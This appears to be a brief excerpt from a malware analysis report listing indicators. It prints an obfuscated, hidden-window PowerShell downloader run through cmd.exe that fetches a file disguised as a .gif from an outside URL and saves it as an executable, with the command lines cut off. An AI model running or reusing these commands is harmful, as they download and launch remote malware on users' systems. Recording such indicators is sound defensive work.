Technical Information
- http://www.znedpesa.tp/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWeRSheLL.ExE -ExECuTIONplICy BypasS -nPrfIlE -wiNdOWsTYlE hidDEn (NEW-OBJeCt sysTeM.nET.wEbcLient).dOWNLOadFilE('http://www.znedpesa.tp/read.php?f=1.gif','%APpdatA%.eXe');ST...
- '<SYSTEM32>\cmd.exe' /c "pOWeRSheLL.ExE -ExECuTIONplICy BypasS -nPrfIlE -wiNdOWsTYlE hidDEn (NEW-OBJeCt sysTeM.nET.wEbcLient).dOWNLOadFilE('http://www.znedpesa.tp/read.php?f=1.gif','%APpdatA%.eXe');ST...' (with hidden window)